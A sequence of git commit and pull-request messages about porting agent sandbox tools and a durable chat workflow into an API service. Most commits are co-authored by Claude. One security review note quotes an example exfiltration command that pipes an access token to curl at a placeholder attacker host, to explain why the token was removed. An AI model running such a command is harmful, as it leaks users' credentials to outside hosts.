so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
